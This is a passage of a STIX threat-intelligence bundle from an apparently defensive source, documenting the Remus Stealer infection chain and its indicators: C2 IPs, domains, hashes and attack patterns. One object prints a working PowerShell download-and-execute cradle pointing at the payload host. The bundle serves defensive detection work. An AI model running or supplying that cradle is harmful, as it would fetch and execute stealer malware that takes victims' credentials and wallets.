{
 "type": "bundle",
 "id": "bundle--1859abad-0db5-5c92-b1c1-6b07b8f5f7be",
 "objects": [
  {
   "type": "identity",
   "spec_version": "2.1",
   "id": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "Dispensight / SecureLeaf",
   "description": "Defensive CTI — secureleaf.dispensight.com",
   "identity_class": "organization"
  },
  {
   "type": "malware",
   "spec_version": "2.1",
   "id": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736591Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "Remus Stealer (WP-002)",
   "description": "WP-002 terminal payload. Native x64 core, manually mapped fileless at its preferred base 0x140000000 into a hollowed CREATE_SUSPENDED child — v15.3 corrects v15.1: the a3x targets a second AutoIt3.exe copy, falling back to System32\\TapiUnattend.exe, not a browser. Managed .NET collection component. Durable RSA-1024 CAPI C2 handshake key (modulus SHA-256 dc4cb858…febfac6f, e=65537) is runtime-resolved in the PowerShell stage and confirmed absent from the static a3x.",
   "malware_types": [
    "spyware",
    "stealer"
   ],
   "is_family": true,
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "description": "v15.3 consolidated — a3x decompiled, native core recovered, verified against the 2026-09-02 detonation capture",
     "external_id": "SL-ADV-2026-WP-001"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "attack-pattern",
   "spec_version": "2.1",
   "id": "attack-pattern--4ee5584d-24c1-5b81-bebe-c8965953b23b",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.7373Z",
   "modified": "2026-09-02T03:14:39.7373Z",
   "name": "ClickFix (paste-and-run)",
   "description": "Fake Cloudflare Turnstile 'verification' page instructs victim Win+R -> Ctrl+V -> OK, executing a clipboard-poisoned PowerShell one-liner.",
   "external_references": [
    {
     "source_name": "mitre-attack",
     "external_id": "T1204.004"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "attack-pattern",
   "spec_version": "2.1",
   "id": "attack-pattern--8aa7ed1b-a02f-5a78-9ff5-9aeac9cf53e8",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.737574Z",
   "modified": "2026-09-02T03:14:39.737574Z",
   "name": "EtherHiding (blockchain-hosted stage)",
   "description": "BSC-testnet smart contract 0xae5d8eec…08034 (selector 0xe2179b8e) returns base64 JS that appends the asseload.com widget loader.",
   "external_references": [
    {
     "source_name": "mitre-attack",
     "external_id": "T1102"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "attack-pattern",
   "spec_version": "2.1",
   "id": "attack-pattern--22efb52c-523e-5ddb-b47e-71349c9dfae8",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.737752Z",
   "modified": "2026-09-02T03:14:39.737752Z",
   "name": "PowerShell IEX download-cradle",
   "description": "powershell -w h -c iex(New-Object Net.WebClient).DownloadString(hxxp://193.221.200.66:4139/tools/soft/coms)",
   "external_references": [
    {
     "source_name": "mitre-attack",
     "external_id": "T1059.001"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "attack-pattern",
   "spec_version": "2.1",
   "id": "attack-pattern--b0f1ec37-689a-5888-83e0-f1d64ec4620b",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.737911Z",
   "modified": "2026-09-02T03:14:39.737911Z",
   "name": "IExpress SFX + AutoIt loader",
   "description": "IntroductionChassis.exe (IExpress SFX) drops legit AutoIt3.exe + compiled Corpus.a3x; AutoIt3.exe executes the packed a3x.",
   "external_references": [
    {
     "source_name": "mitre-attack",
     "external_id": "T1027"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "attack-pattern",
   "spec_version": "2.1",
   "id": "attack-pattern--d8a41404-841c-5199-b96b-51214793f2ed",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.738095Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "Process hollowing",
   "description": "AutoIt loader injects the native Remus core into a hollowed browser process at 0x140000000 via SetThreadContext/WriteProcessMemory. [v15.3: no CreateRemoteThread — the loader redirects the existing primary thread with NtSetContextThread + NtResumeThread, so Sysmon EID 8 will not fire; EID 25 ProcessTampering is the correct telemetry.]",
   "external_references": [
    {
     "source_name": "mitre-attack",
     "external_id": "T1055.012"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "attack-pattern",
   "spec_version": "2.1",
   "id": "attack-pattern--645ac42c-f600-57e4-8854-a190bb398dd3",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.738365Z",
   "modified": "2026-09-02T03:14:39.738365Z",
   "name": "Browser/credential collection",
   "description": "Managed .NET component reads browser profile data and credential stores; Firefox profile access observed.",
   "external_references": [
    {
     "source_name": "mitre-attack",
     "external_id": "T1555.003"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "attack-pattern",
   "spec_version": "2.1",
   "id": "attack-pattern--fce0929a-efa9-5d0d-8c3e-aeff83953378",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.738579Z",
   "modified": "2026-09-02T03:14:39.738579Z",
   "name": "Cryptocurrency wallet collection",
   "description": "Enumerates cryptocurrency wallet files/directories for harvesting.",
   "external_references": [
    {
     "source_name": "mitre-attack",
     "external_id": "T1005"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "attack-pattern",
   "spec_version": "2.1",
   "id": "attack-pattern--7c310323-a39f-524b-a299-8bdd3188d9c8",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.73876Z",
   "modified": "2026-09-02T03:14:39.73876Z",
   "name": "HTTP exfiltration (github.com host-spoof)",
   "description": "POST /invoices to 209.38.82.72:9048, Host: github.com spoof. Body schema variant-1 access_token/debug, variant-2 tag/exp/hwid. 'chunk-' framing prefix in native core.",
   "external_references": [
    {
     "source_name": "mitre-attack",
     "external_id": "T1071.001"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "attack-pattern",
   "spec_version": "2.1",
   "id": "attack-pattern--1f7ca2be-41aa-50c1-83e4-0de0bf23cef7",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.738933Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "Scheduled task persistence",
   "description": "Task Scheduler COM API / at.exe invocation for persistence. [v15.3: UNCONFIRMED — decompilation of Corpus.a3x found no persistence primitive of any kind. If persistence exists in this wave it is established by the SFX or the PowerShell stage, not by the AutoIt loader.]",
   "external_references": [
    {
     "source_name": "mitre-attack",
     "external_id": "T1053.005"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "infrastructure",
   "spec_version": "2.1",
   "id": "infrastructure--48e22724-14b7-502e-9960-1ebb02f8eb05",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.739055Z",
   "modified": "2026-09-02T03:14:39.739055Z",
   "name": "dorz.nl (compromised lure)",
   "description": "Compromised WordPress/Elementor host serving ClickFix. VICTIM — splitcam: never blocklist.",
   "infrastructure_types": [
    "hosting-target-lists"
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "infrastructure",
   "spec_version": "2.1",
   "id": "infrastructure--d9d7e354-d7d8-5443-8a63-b1a55cea1d19",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.739201Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "asseload.com widget staging",
   "description": "Cloudflare-fronted ClickFix widget stager: aps.js -> a/9f2b4d03635c.js (XOR key oipCQd0DIbeF). [v15.3: contacted with SNI 'cloudflare-ech.com' (Encrypted Client Hello) — SNI-based inspection and blocking are blind to it. Its A records are shared Cloudflare addresses (104.21.59.52, 172.67.214.143); block by DNS name / RPZ only, never by IP.]",
   "infrastructure_types": [
    "command-and-control"
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "infrastructure",
   "spec_version": "2.1",
   "id": "infrastructure--f4349a82-f96b-57df-8a4b-4730dd7ef6fa",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.73939Z",
   "modified": "2026-09-02T03:14:39.73939Z",
   "name": "193.221.200.66:4139 payload host",
   "description": "uvicorn/web; serves PowerShell dropper /tools/soft/coms and ZIP /tools/soft/file.",
   "infrastructure_types": [
    "command-and-control"
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "infrastructure",
   "spec_version": "2.1",
   "id": "infrastructure--27db47d5-a5e1-553e-9b57-9782ab927232",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.739549Z",
   "modified": "2026-09-02T03:14:39.739549Z",
   "name": "Remus C2 209.38.82.72:9048",
   "description": "POST /invoices, Host: github.com spoof. Domains: cdire.shop (and prior). Confirmed across two waves.",
   "infrastructure_types": [
    "command-and-control"
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "indicator",
   "spec_version": "2.1",
   "id": "indicator--be3758b2-7209-5273-bf1c-15c5e9d182bd",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.739677Z",
   "modified": "2026-09-02T03:14:39.739677Z",
   "name": "Remus C2 IP",
   "description": "C2 endpoint :9048 /invoices",
   "indicator_types": [
    "malicious-activity"
   ],
   "pattern": "[ipv4-addr:value = '209.38.82.72']",
   "pattern_type": "stix",
   "pattern_version": "2.1",
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "description": "v15.3 consolidated — a3x decompiled, native core recovered, verified against the 2026-09-02 detonation capture",
     "external_id": "SL-ADV-2026-WP-001"
    }
   ],
   "valid_from": "2026-09-02T03:14:39.739677Z",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "indicator",
   "spec_version": "2.1",
   "id": "indicator--3d1a8918-8360-561f-9558-99032bc242cb",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.744404Z",
   "modified": "2026-09-02T03:14:39.744404Z",
   "name": "C2 domain cdire.shop",
   "description": "Resolves 209.38.82.72",
   "indicator_types": [
    "malicious-activity"
   ],
   "pattern": "[domain-name:value = 'cdire.shop']",
   "pattern_type": "stix",
   "pattern_version": "2.1",
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "description": "v15.3 consolidated — a3x decompiled, native core recovered, verified against the 2026-09-02 detonation capture",
     "external_id": "SL-ADV-2026-WP-001"
    }
   ],
   "valid_from": "2026-09-02T03:14:39.744404Z",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "indicator",
   "spec_version": "2.1",
   "id": "indicator--6925510a-ab14-5c3f-b3e4-65f4207050e6",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.745728Z",
   "modified": "2026-09-02T03:14:39.745728Z",
   "name": "Stager asseload.com",
   "description": "ClickFix widget host",
   "indicator_types": [
    "malicious-activity"
   ],
   "pattern": "[domain-name:value = 'asseload.com']",
   "pattern_type": "stix",
   "pattern_version": "2.1",
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "description": "v15.3 consolidated — a3x decompiled, native core recovered, verified against the 2026-09-02 detonation capture",
     "external_id": "SL-ADV-2026-WP-001"
    }
   ],
   "valid_from": "2026-09-02T03:14:39.745728Z",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "indicator",
   "spec_version": "2.1",
   "id": "indicator--6f4e48e6-7d0d-597c-92ba-12f1e0309600",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.74655Z",
   "modified": "2026-09-02T03:14:39.74655Z",
   "name": "Payload host 193.221.200.66",
   "description": "PS dropper + ZIP",
   "indicator_types": [
    "malicious-activity"
   ],
   "pattern": "[ipv4-addr:value = '193.221.200.66']",
   "pattern_type": "stix",
   "pattern_version": "2.1",
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "description": "v15.3 consolidated — a3x decompiled, native core recovered, verified against the 2026-09-02 detonation capture",
     "external_id": "SL-ADV-2026-WP-001"
    }
   ],
   "valid_from": "2026-09-02T03:14:39.74655Z",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "indicator",
   "spec_version": "2.1",
   "id": "indicator--bcac4e93-ec79-5cb2-8066-5527f0804aa7",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.747135Z",
   "modified": "2026-09-02T03:14:39.747135Z",
   "name": "Lure dorz.nl",
   "description": "Compromised lure — victim context, do not block",
   "indicator_types": [
    "benign",
    "compromised"
   ],
   "pattern": "[domain-name:value = 'dorz.nl']",
   "pattern_type": "stix",
   "pattern_version": "2.1",
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "description": "v15.3 consolidated — a3x decompiled, native core recovered, verified against the 2026-09-02 detonation capture",
     "external_id": "SL-ADV-2026-WP-001"
    }
   ],
   "valid_from": "2026-09-02T03:14:39.747135Z",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "indicator",
   "spec_version": "2.1",
   "id": "indicator--6695b7b0-8a6f-5507-b843-2679b4147a27",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.747804Z",
   "modified": "2026-09-02T03:14:39.747804Z",
   "name": "IntroductionChassis.exe SFX",
   "description": "IExpress SFX dropper",
   "indicator_types": [
    "malicious-activity"
   ],
   "pattern": "[file:hashes.'SHA-256' = '2a1d78fb02d047605ac2400b18e4bc902fe752bde24ccee0aa5c46def9787680']",
   "pattern_type": "stix",
   "pattern_version": "2.1",
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "description": "v15.3 consolidated — a3x decompiled, native core recovered, verified against the 2026-09-02 detonation capture",
     "external_id": "SL-ADV-2026-WP-001"
    }
   ],
   "valid_from": "2026-09-02T03:14:39.747804Z",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "indicator",
   "spec_version": "2.1",
   "id": "indicator--8e9bce63-50f6-559a-bb8b-a5d46fcaf0a2",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.751061Z",
   "modified": "2026-09-02T03:14:39.751061Z",
   "name": "Corpus.a3x",
   "description": "Compiled AutoIt payload (packed)",
   "indicator_types": [
    "malicious-activity"
   ],
   "pattern": "[file:hashes.'SHA-256' = '74a517b6b24b47a45101af70b9c5ca3572502e3e027fd69badc8dc3757a4a67f']",
   "pattern_type": "stix",
   "pattern_version": "2.1",
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "description": "v15.3 consolidated — a3x decompiled, native core recovered, verified against the 2026-09-02 detonation capture",
     "external_id": "SL-ADV-2026-WP-001"
    }
   ],
   "valid_from": "2026-09-02T03:14:39.751061Z",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "indicator",
   "spec_version": "2.1",
   "id": "indicator--2e948793-58f2-59f9-8516-f71fd65b3bfe",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.751794Z",
   "modified": "2026-09-02T03:14:39.751794Z",
   "name": "Native core .text",
   "description": "Terminal native Remus core, .text section (fileless, injected @0x140000000)",
   "indicator_types": [
    "malicious-activity"
   ],
   "pattern": "[file:hashes.'SHA-256' = 'eba3f014bd57d992c69a56854c0f8ac07b665d2721053edd88db144e5814c138']",
   "pattern_type": "stix",
   "pattern_version": "2.1",
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "description": "v15.3 consolidated — a3x decompiled, native core recovered, verified against the 2026-09-02 detonation capture",
     "external_id": "SL-ADV-2026-WP-001"
    }
   ],
   "valid_from": "2026-09-02T03:14:39.751794Z",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "indicator",
   "spec_version": "2.1",
   "id": "indicator--1632dbac-b073-5279-bc26-dd41ceb1bc65",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.752453Z",
   "modified": "2026-09-02T03:14:39.752453Z",
   "name": "Exfil URI pattern",
   "description": "POST /invoices with github.com host spoof",
   "indicator_types": [
    "malicious-activity"
   ],
   "pattern": "[network-traffic:extensions.'http-request-ext'.request_value = '/invoices']",
   "pattern_type": "stix",
   "pattern_version": "2.1",
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "description": "v15.3 consolidated — a3x decompiled, native core recovered, verified against the 2026-09-02 detonation capture",
     "external_id": "SL-ADV-2026-WP-001"
    }
   ],
   "valid_from": "2026-09-02T03:14:39.752453Z",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--0e5afcd1-4f2e-54ed-aec1-479389cc693e",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.754746Z",
   "modified": "2026-09-02T03:14:39.754746Z",
   "relationship_type": "indicates",
   "source_ref": "indicator--be3758b2-7209-5273-bf1c-15c5e9d182bd",
   "target_ref": "infrastructure--27db47d5-a5e1-553e-9b57-9782ab927232",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--6bf7ede7-53d1-5b32-97dc-e3f20a5e012e",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.754986Z",
   "modified": "2026-09-02T03:14:39.754986Z",
   "relationship_type": "indicates",
   "source_ref": "indicator--3d1a8918-8360-561f-9558-99032bc242cb",
   "target_ref": "infrastructure--27db47d5-a5e1-553e-9b57-9782ab927232",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--84227192-4450-5df6-8b00-9872a7b7135c",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.755212Z",
   "modified": "2026-09-02T03:14:39.755212Z",
   "relationship_type": "indicates",
   "source_ref": "indicator--6925510a-ab14-5c3f-b3e4-65f4207050e6",
   "target_ref": "infrastructure--d9d7e354-d7d8-5443-8a63-b1a55cea1d19",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--bc93bf87-0ace-5374-8871-166c77d430a5",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.755456Z",
   "modified": "2026-09-02T03:14:39.755456Z",
   "relationship_type": "indicates",
   "source_ref": "indicator--6f4e48e6-7d0d-597c-92ba-12f1e0309600",
   "target_ref": "infrastructure--f4349a82-f96b-57df-8a4b-4730dd7ef6fa",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--b4b59884-63ef-5033-97ca-84c398f8c073",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.755637Z",
   "modified": "2026-09-02T03:14:39.755637Z",
   "relationship_type": "indicates",
   "source_ref": "indicator--bcac4e93-ec79-5cb2-8066-5527f0804aa7",
   "target_ref": "infrastructure--48e22724-14b7-502e-9960-1ebb02f8eb05",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--c6cb500b-b0b5-5204-876e-114ed0b9d7bf",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.755814Z",
   "modified": "2026-09-02T03:14:39.755814Z",
   "relationship_type": "indicates",
   "source_ref": "indicator--6695b7b0-8a6f-5507-b843-2679b4147a27",
   "target_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--e2139a8f-d302-5503-a10d-9a6773b39f43",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.755992Z",
   "modified": "2026-09-02T03:14:39.755992Z",
   "relationship_type": "indicates",
   "source_ref": "indicator--8e9bce63-50f6-559a-bb8b-a5d46fcaf0a2",
   "target_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--fe1a7e38-8aee-5776-b884-29ff0ee48784",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.756211Z",
   "modified": "2026-09-02T03:14:39.756211Z",
   "relationship_type": "indicates",
   "source_ref": "indicator--2e948793-58f2-59f9-8516-f71fd65b3bfe",
   "target_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--cfad8157-8f14-5419-8d7b-2cef432fe79f",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.756429Z",
   "modified": "2026-09-02T03:14:39.756429Z",
   "relationship_type": "indicates",
   "source_ref": "indicator--1632dbac-b073-5279-bc26-dd41ceb1bc65",
   "target_ref": "infrastructure--27db47d5-a5e1-553e-9b57-9782ab927232",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--a7a5778c-0ce6-54ff-a7eb-9ff418bd3352",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.756567Z",
   "modified": "2026-09-02T03:14:39.756567Z",
   "relationship_type": "uses",
   "source_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "target_ref": "attack-pattern--4ee5584d-24c1-5b81-bebe-c8965953b23b",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--59646a46-bb9a-5898-9087-dd554e5b8bf9",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.756697Z",
   "modified": "2026-09-02T03:14:39.756697Z",
   "relationship_type": "uses",
   "source_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "target_ref": "attack-pattern--8aa7ed1b-a02f-5a78-9ff5-9aeac9cf53e8",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--9a1a8603-be2f-5908-82e2-c0571a84c039",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.756844Z",
   "modified": "2026-09-02T03:14:39.756844Z",
   "relationship_type": "uses",
   "source_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "target_ref": "attack-pattern--22efb52c-523e-5ddb-b47e-71349c9dfae8",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--0279f565-2ff3-5cd2-9d2e-22980c5112e6",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.756993Z",
   "modified": "2026-09-02T03:14:39.756993Z",
   "relationship_type": "uses",
   "source_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "target_ref": "attack-pattern--b0f1ec37-689a-5888-83e0-f1d64ec4620b",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--da4509d5-fbb0-529c-a4f6-156d8a5af4f6",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.757128Z",
   "modified": "2026-09-02T03:14:39.757128Z",
   "relationship_type": "uses",
   "source_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "target_ref": "attack-pattern--d8a41404-841c-5199-b96b-51214793f2ed",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--79f2a093-e71d-532b-8d43-996d5ef42d58",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.757251Z",
   "modified": "2026-09-02T03:14:39.757251Z",
   "relationship_type": "uses",
   "source_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "target_ref": "attack-pattern--645ac42c-f600-57e4-8854-a190bb398dd3",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--5cd80da7-7a17-5bae-971c-27d62a1e2550",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.757486Z",
   "modified": "2026-09-02T03:14:39.757486Z",
   "relationship_type": "uses",
   "source_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "target_ref": "attack-pattern--fce0929a-efa9-5d0d-8c3e-aeff83953378",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--b8253146-43f0-5691-a66f-31d6438270e8",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.757655Z",
   "modified": "2026-09-02T03:14:39.757655Z",
   "relationship_type": "uses",
   "source_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "target_ref": "attack-pattern--7c310323-a39f-524b-a299-8bdd3188d9c8",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--48ea28e4-25a4-506e-ba83-87ab85ab566b",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.757775Z",
   "modified": "2026-09-02T03:14:39.757775Z",
   "relationship_type": "uses",
   "source_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "target_ref": "attack-pattern--1f7ca2be-41aa-50c1-83e4-0de0bf23cef7",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
